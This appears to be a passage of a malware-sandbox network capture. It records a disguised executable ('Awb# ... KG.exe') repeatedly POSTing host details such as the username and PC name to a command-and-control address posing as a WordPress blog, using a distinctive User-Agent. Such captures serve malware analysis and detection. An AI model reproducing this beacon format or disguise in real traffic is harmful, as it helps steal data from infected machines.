                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:48.426044941 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:48.426086903 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:48.426125050 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              84192.168.2.44983445.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:48.680283070 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:48.807760000 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:49.635854959 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:48 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:49.635963917 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:49.646401882 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:49.646917105 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:49.646954060 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:49.646987915 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:49.647141933 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:49.647183895 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:49.647372961 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 25, 2024 09:43:49.647412062 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                              Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              85192.168.2.44983545.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:49.906919003 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:50.036832094 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:50.873189926 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:49 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:50.873224020 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:50.881438017 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:50.881711006 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:50.881839991 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:50.881925106 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:50.882101059 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:50.882119894 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:50.882246971 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 25, 2024 09:43:50.882285118 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                              Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              86192.168.2.44983645.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:51.138011932 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:51.269185066 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:52.190967083 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:51 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:52.191026926 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:52.191121101 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:52.206783056 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:52.209263086 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:52.209402084 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:52.209625959 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:52.211304903 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:52.211345911 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:52.211383104 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              87192.168.2.44983745.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:52.470303059 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:52.603302956 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:56.450469971 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:52 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:56.450628996 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:56.450666904 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:56.462632895 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:56.462670088 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:56.462703943 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:56.462795019 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:56.462912083 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:56.462949991 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:56.463193893 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              88192.168.2.44983845.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:56.719259977 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:56.850287914 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
